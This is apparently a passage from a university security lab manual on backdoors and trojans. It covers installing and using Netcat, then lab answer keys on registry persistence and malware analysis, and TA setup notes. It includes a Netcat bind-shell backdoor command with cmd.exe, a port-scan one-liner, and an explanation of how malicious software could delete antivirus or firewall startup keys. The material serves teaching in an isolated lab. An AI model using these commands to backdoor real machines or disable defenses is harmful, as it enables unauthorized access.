  • 25. Appendix D – Installation and use of Netcat EXCERPTS FROM LAB 6: BACKDOORS AND TROJANS Installing Netcat on the Windows machine Start your main Windows machine (XP 1) and copy the 57.35.10.10secure_classToolsWindows directory to your computer. Unzip the nc11nt.zip program and it should automatically create a directory called nc11nt. Now, whenever you want to run Netcat, you will have to go into this folder and run it from there (unless you add this directory to the path). Now install Netcat on the other XP machine too (XP2). Installing Netcat on the Linux machine You should already have a file called netcat.tar.gz in your /home/tools directory. If you don’t, get it from /mnt/nas4112/Tools/Linux/, after mounting the NAS server. Go into your /home/tools directory and execute the following commands: #tar xvfz netcat.tar.gz #cd netcat #make linux #cp nc /usr/local/sbin The last command will allow you to run Netcat without having to specify this directory. Using Netcat The executable program on both operating systems is called nc and the options are the same on both systems. To run Netcat in client mode so that it sends data across a network, use #nc [IP Address to send to] [Port to send to] (e.g. nc a.b.c.d 1234 - This sends data to port 1234 on machine a.b.c.d) All input is through standard in, so whatever you type on the keyboard will be sent to the other machine. Alternatively, if you would like to read data from a file and pipe that through to the other machine, use #nc [IP address to send to] [Port to send to] < [File to read from] (e.g. nc a.b.c.d 1224 < testfile.txt - This sends the data in testfile.txt) To stop Netcat, one simply has to press Ctrl+C. There are several different options that Netcat can be run with, depending on what it is being used for. The most common options are: -l specifies that Netcat is running in listening mode -p specified which port Netcat should listen on -v verbose mode so that all results are displayed -w maximum amount of time (in clock ticks) to wait for a response -z specifies that Netcat should send very minimal data, usually a synchronized packet to see if a response is obtained -e Allows Netcat to execute a program to receive or generate network traffic
  • 26. Look at the README files on both systems under the Netcat folder to find out more information about running Netcat. Many uses for netcat are found in the readme. To run Netcat in listen mode, use the -l and -p options. The command syntax would be: #nc -l -p [port to listen to] If you want to store the input that is received, you can pipe all the received data to a file, using the following command: #nc -l -p [port to listen to] > [file to write to] (e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to testfile.txt). NOTE: If you pipe everything to a file, whatever was previously in that file will be overwritten. Netcat can also be used to scan ports using the following command (Netcat is being used in client mode for this): #echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan] (e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - This will scan ports 1 to 200 on the system with IP address a.b.c.d) Netcat can also be used to create backdoors on systems. Attackers can push a shell between systems over any TCP or UDP port. The shell will have the privileges of the user that executes Netcat in listener mode on the machine being exploited. For example, if you are on the Linux machine and would like to execute commands on the Windows machine, set up the Netcat listener on the Windows machine with the following command: #nc -l –p [port to listen to] -e cmd.exe (e.g. nc -l -p 7777 -e cmd.exe This will pipe all input received at port 7777 to cmd.exe, which will then execute the commands. ) On the client side, simply type #nc [listening machine] [port to connect to] (e.g. nc a.b.c.d 7777) and start typing in your commands.
  • 27. Jason Orlosky, Phillip Michael, Todd Lyon Lab Solutions Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key. A1.1 Keys: Data: (default) (value not set) CMDstarter “C:WINDOWSSYSTEM32cmd.exe” Other keys such as VMware may appear depending on what other programs have been installed. The above two are required. Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary. The Infect.bat file adds a key to the registry to run the Infect.bat file at startup. This key has the name: ‘Process’ with data: "C:WINDOWSHiddenFolderInfect.bat." The program then creates the correct directory matching the new key’s data. After it runs itself, it will copy the viral file from its own directory into the C:Windows directory and run it after renaming it. This way, once the virus is deleted from the Windows directory, a user will think her or she has deleted the virus, when it is still actually on the system in an inactive folder. Searching for MrMalicious will not yield the hidden viral code. Attachment # 1 Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Group## as the Name and no data. HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet Audio Feel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab. Correct Code:
  • 28. reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet Audio /v group## exit Slight variations of this code are acceptable but the student must have the reg add line. Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful) A1.3 A hacker would have to write software that searches for a string in the registry key such as firewall or anti-virus. The software could use the query command recursively in the Run hive to search data strings and names. After parsing the names and data, it could determine whether an antivirus or firewall key exists, and delete it. Screenshot #1 Search through the registry accesses and locate the malicious key. Highlight the key in the RegMon and take a screenshot. Include this with your lab for turn-in. Screenshot #1 should look like the above Screenshot #2 Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot. Include this with your lab for turn-in. The system will show a windows startup screen but then go black and continually stay black. The I/O disk light will blink constantly on the VMware screen and the Windows OS will never boot. Screenshot #2 should look like the attachment on the next page.
  • 29. Note: A screenshot of the deleted software hive is also permissible. Q2.4 Why is it that not many hackers have used the registry to disable operating systems? Hackers generally try to accomplish a goal such as advertising for a company or setting up a money making scheme. Disabling a user’s operating system does nothing other than preventing users from accessing files. This type of attack could be crippling to a business where many monetary or governmental documents are stored. Screenshot #3 Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program. Q3.5 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur? The 7.2 Machine is sending continous Syn’s, but because the Windows firewall is up all the packets are dropped.
  • 30. Q3.6 What does this command show? All open ports for both this user, and the machine. Q3.7 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat? You are still able to gain administrator access. Screenshot #4 Take a screenshot of the the entry running server.exe highlighted in the registry
  • 31. Q3.8 How can you detect malicious code such as the 8633 program running on your computer? Using the task manager, and knowing what process’s are running on your computer and what they are. Also monitoring what ports are open, and making sure new ones are not randomly opened. Q3.9 What should you do avoid having malicious code such as this installed on your machine in the first place? Q 4.1 - What is the name of the virus process loaded in memory? Rnathchk.exe Q 4.2 - Is this process running a server? Yes Q 4.3 - If yes, What port is it listening on? 36276 (Random Port) Q 4.4 - What type of server does this appear to be? FTP Q 4.5 - Do you receive a login prompt? Yes
  • 32. S 4.1 - Take a screen capture of your ftp session. Q 4.6 - What port number do you see a large number of connections to? 445 Q 4.7 - Why do you think this is? The virus is trying to redistribute it’s self Q 4.8 - What port are connections extablished to? 25 & 48275 Q 4.9 - What is it connecting to these 2 different ports for? SMTP & IRC(BotNet) Q 4.10 - What is the virus repeatively doing to the registry, and why do you think this is? Reinstalls its self for startup S 4.2 Take a screen capture of this Q 4.11 - What is the name and path of the executable created once document.pif is executed? C:windowssystem32 Q 4.12 - There are 3 files created to replicate the virus on the hard drive where are they and what are there names? C:pic.src
  • 33. C:see_this!.pif C:my_picture.scr Q 4.13 - Why do you think the virus searches for files on the hard drive? To find e-mail address ( This question is hard and not obvious) Q 4.14 - What port is it trying to connect to and why? Port 445 to redistribute its self S 4.3 - Take a screen capture of this Q 4.15 - What is an advantage of active logging over active monitoring? Logging you can view capture all events but active logging you can only view current events Do not just run any program you receive, make sure it is from a trusted vendor. Also using a tool to monitor additions to the registry will help avoid malicious code such as this.
  • 34. Lab instructions for TA Create a virtual machine image of Windows XP with Service pack 2 and put on the NAS for this lab. Also make sure the following files are available for download on the NAS server: - Regmon.exe - Jpfwall.exe - Hiddenfolder - folder containing: - Infect.bat - RenameMe.exe -Netcat - ZSNES.zip - installer.c - server.c - VCToolkitSetup - dbg_x86_6.4.7.2 Make sure all other files included with the lab are copied to the Nas Server